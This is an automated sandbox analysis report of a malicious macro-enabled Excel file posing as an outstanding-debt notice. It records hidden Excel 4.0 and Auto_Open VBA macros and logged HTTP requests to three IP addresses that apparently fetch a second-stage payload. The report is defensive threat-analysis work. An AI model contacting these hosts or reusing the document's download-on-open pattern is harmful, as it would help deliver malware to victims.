Loading ...

Play interactive tourEdit tour

Analysis Report Outstanding-Debt-1754918061-05042021.xlsm

Overview

General Information

Sample Name:Outstanding-Debt-1754918061-05042021.xlsm
Analysis ID:404114
MD5:5ac72cad6c794e97474276ba534aa095
SHA1:5236650b529792d7aa754c62e1db170a62ecc13d
SHA256:06b4a994cc6b9629775ebfcf818cd44267af85d7515980d4edc3c174ac47b6da
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Allocates a big amount of memory (probably used for heap spraying)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6168 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Source: excel.exeMemory has grown: Private usage: 1MB later: 82MB
Source: global trafficTCP traffic: 192.168.2.5:49710 -> 91.211.91.81:80
Source: global trafficTCP traffic: 192.168.2.5:49710 -> 91.211.91.81:80
Source: Joe Sandbox ViewIP Address: 91.211.91.81 91.211.91.81
Source: Joe Sandbox ViewIP Address: 5.34.179.36 5.34.179.36
Source: Joe Sandbox ViewIP Address: 45.153.229.23 45.153.229.23
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.211.91.81Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 5.34.179.36Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.153.229.23Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.211.91.81Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 5.34.179.36Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.153.229.23Connection: Keep-Alive
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://api.aadrm.com/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://api.cortana.ai
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://api.office.net
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://api.onedrive.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://augloop.office.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://cdn.entity.
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://clients.config.office.net/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://config.edge.skype.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://cortana.ai
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://cortana.ai/api
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://cr.office.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://dev.cortana.ai
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://devnull.onenote.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://directory.services.
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://graph.windows.net
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://graph.windows.net/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://lifecycle.office.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://login.windows.local
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://management.azure.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://management.azure.com/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://messaging.office.com/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://ncus.contentsync.
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://officeapps.live.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://onedrive.live.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://outlook.office.com/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://outlook.office365.com/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://settings.outlook.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://staging.cortana.ai
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://tasks.office.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://wus2.contentsync.
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 698326C4-F3C9-4F7A-9780-B9A6310F518E.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: Outstanding-Debt-1754918061-05042021.xlsmInitial sample: urlmon
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_Open, API Microsoft Excel:Application.Run(:Range)
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Outstanding-Debt-1754918061-05042021.xlsmInitial sample: EXEC
Source: Outstanding-Debt-1754918061-05042021.xlsmOLE, VBA macro line: Private Sub Auto_Open()
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_Open
Source: Outstanding-Debt-1754918061-05042021.xlsmOLE indicator, VBA macros: true
Source: classification engineClassification label: mal60.expl.evad.winXLSM@1/10@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{A58B532B-28BD-4F41-AF71-F365CEEABFAB} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Outstanding-Debt-1754918061-05042021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
Source: Outstanding-Debt-1754918061-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Outstanding-Debt-1754918061-05042021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Outstanding-Debt-1754918061-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Outstanding-Debt-1754918061-05042021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
